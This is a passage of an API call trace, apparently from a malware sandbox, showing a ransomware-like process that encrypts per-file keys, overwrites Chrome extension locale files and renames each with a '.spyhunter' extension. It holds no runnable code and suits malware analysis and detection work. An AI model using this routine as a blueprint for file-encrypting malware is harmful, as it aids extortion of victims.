lpNumberOfBytesWritten=0x270f22c*=0xdb, lpOverlapped=0x0) returned 1 [0136.322] GetProcessHeap () returned 0x2c0000 [0136.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.322] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.323] WriteFile (in: hFile=0x17c, lpBuffer=0x270f26c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f22c, lpOverlapped=0x0 | out: lpBuffer=0x270f26c*, lpNumberOfBytesWritten=0x270f22c*=0x4, lpOverlapped=0x0) returned 1 [0136.323] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f22c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f22c*=0x30, lpOverlapped=0x0) returned 1 [0136.323] CloseHandle (hObject=0x17c) returned 1 [0136.323] GetProcessHeap () returned 0x2c0000 [0136.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.323] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.spyhunter") returned 166 [0136.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0136.324] GetProcessHeap () returned 0x2c0000 [0136.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.324] GetProcessHeap () returned 0x2c0000 [0136.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.324] GetProcessHeap () returned 0x2c0000 [0136.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7968 | out: hHeap=0x2c0000) returned 1 [0136.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f268 | out: pbBuffer=0x270f268) returned 1 [0136.325] GetProcessHeap () returned 0x2c0000 [0136.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.326] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f260*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f260*=0x30) returned 1 [0136.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.326] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0136.326] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.326] GetProcessHeap () returned 0x2c0000 [0136.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.326] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f224, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f224*=0xd8, lpOverlapped=0x0) returned 1 [0136.327] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.327] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x270f224, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f224*=0xd8, lpOverlapped=0x0) returned 1 [0136.327] GetProcessHeap () returned 0x2c0000 [0136.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.328] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.328] WriteFile (in: hFile=0x17c, lpBuffer=0x270f264*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f224, lpOverlapped=0x0 | out: lpBuffer=0x270f264*, lpNumberOfBytesWritten=0x270f224*=0x4, lpOverlapped=0x0) returned 1 [0136.328] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f224, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f224*=0x30, lpOverlapped=0x0) returned 1 [0136.328] CloseHandle (hObject=0x17c) returned 1 [0136.328] GetProcessHeap () returned 0x2c0000 [0136.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.328] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.spyhunter") returned 165 [0136.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0136.329] GetProcessHeap () returned 0x2c0000 [0136.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.329] GetProcessHeap () returned 0x2c0000 [0136.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.329] GetProcessHeap () returned 0x2c0000 [0136.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7658 | out: hHeap=0x2c0000) returned 1 [0136.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f260 | out: pbBuffer=0x270f260) returned 1 [0136.330] GetProcessHeap () returned 0x2c0000 [0136.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f258*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f258*=0x30) returned 1 [0136.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0136.331] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.331] GetProcessHeap () returned 0x2c0000 [0136.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.331] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f21c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f21c*=0xd8, lpOverlapped=0x0) returned 1 [0136.332] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.332] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x270f21c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f21c*=0xd8, lpOverlapped=0x0) returned 1 [0136.332] GetProcessHeap () returned 0x2c0000 [0136.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.332] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.333] WriteFile (in: hFile=0x17c, lpBuffer=0x270f25c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f21c, lpOverlapped=0x0 | out: lpBuffer=0x270f25c*, lpNumberOfBytesWritten=0x270f21c*=0x4, lpOverlapped=0x0) returned 1 [0136.333] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f21c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f21c*=0x30, lpOverlapped=0x0) returned 1 [0136.333] CloseHandle (hObject=0x17c) returned 1 [0136.333] GetProcessHeap () returned 0x2c0000 [0136.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.333] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.spyhunter") returned 165 [0136.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.spyhunter")) returned 1 [0136.334] GetProcessHeap () returned 0x2c0000 [0136.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.334] GetProcessHeap () returned 0x2c0000 [0136.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.334] GetProcessHeap () returned 0x2c0000 [0136.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6ead0 | out: hHeap=0x2c0000) returned 1 [0136.335] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f258 | out: pbBuffer=0x270f258) returned 1 [0136.336] GetProcessHeap () returned 0x2c0000 [0136.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.336] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f250*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f250*=0x30) returned 1 [0136.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0136.336] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.336] GetProcessHeap () returned 0x2c0000 [0136.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.336] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f214, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f214*=0xce, lpOverlapped=0x0) returned 1 [0136.337] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.338] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x270f214, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f214*=0xce, lpOverlapped=0x0) returned 1 [0136.338] GetProcessHeap () returned 0x2c0000 [0136.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.338] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.338] WriteFile (in: hFile=0x17c, lpBuffer=0x270f254*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f214, lpOverlapped=0x0 | out: lpBuffer=0x270f254*, lpNumberOfBytesWritten=0x270f214*=0x4, lpOverlapped=0x0) returned 1 [0136.338] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f214, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f214*=0x30, lpOverlapped=0x0) returned 1 [0136.338] CloseHandle (hObject=0x17c) returned 1 [0136.338] GetProcessHeap () returned 0x2c0000 [0136.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.338] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.spyhunter") returned 169 [0136.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.spyhunter")) returned 1 [0136.339] GetProcessHeap () returned 0x2c0000 [0136.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.339] GetProcessHeap () returned 0x2c0000 [0136.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.339] GetProcessHeap () returned 0x2c0000 [0136.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e948 | out: hHeap=0x2c0000) returned 1 [0136.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f250 | out: pbBuffer=0x270f250) returned 1 [0136.341] GetProcessHeap () returned 0x2c0000 [0136.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f248*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f248*=0x30) returned 1 [0136.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned 155 [0136.531] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.531] GetProcessHeap () returned 0x2c0000 [0136.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.531] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f20c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f20c*=0xce, lpOverlapped=0x0) returned 1 [0136.533] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.533] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x270f20c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f20c*=0xce, lpOverlapped=0x0) returned 1 [0136.534] GetProcessHeap () returned 0x2c0000 [0136.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.534] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.534] WriteFile (in: hFile=0x18c, lpBuffer=0x270f24c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f20c, lpOverlapped=0x0 | out: lpBuffer=0x270f24c*, lpNumberOfBytesWritten=0x270f20c*=0x4, lpOverlapped=0x0) returned 1 [0136.534] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f20c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f20c*=0x30, lpOverlapped=0x0) returned 1 [0136.534] CloseHandle (hObject=0x18c) returned 1 [0136.534] GetProcessHeap () returned 0x2c0000 [0136.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.534] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.spyhunter") returned 165 [0136.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0136.535] GetProcessHeap () returned 0x2c0000 [0136.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.535] GetProcessHeap () returned 0x2c0000 [0136.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.535] GetProcessHeap () returned 0x2c0000 [0136.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e4b0 | out: hHeap=0x2c0000) returned 1 [0136.537] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f248 | out: pbBuffer=0x270f248) returned 1 [0136.537] GetProcessHeap () returned 0x2c0000 [0136.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.537] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f240*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f240*=0x30) returned 1 [0136.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0136.545] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.545] GetProcessHeap () returned 0x2c0000 [0136.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.545] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f204, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f204*=0xe2, lpOverlapped=0x0) returned 1 [0136.546] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.546] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x270f204, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f204*=0xe2, lpOverlapped=0x0) returned 1 [0136.547] GetProcessHeap () returned 0x2c0000 [0136.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.547] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.547] WriteFile (in: hFile=0x18c, lpBuffer=0x270f244*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f204, lpOverlapped=0x0 | out: lpBuffer=0x270f244*, lpNumberOfBytesWritten=0x270f204*=0x4, lpOverlapped=0x0) returned 1 [0136.547] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f204, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f204*=0x30, lpOverlapped=0x0) returned 1 [0136.547] CloseHandle (hObject=0x18c) returned 1 [0136.547] GetProcessHeap () returned 0x2c0000 [0136.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.548] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.spyhunter") returned 165 [0136.548] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: 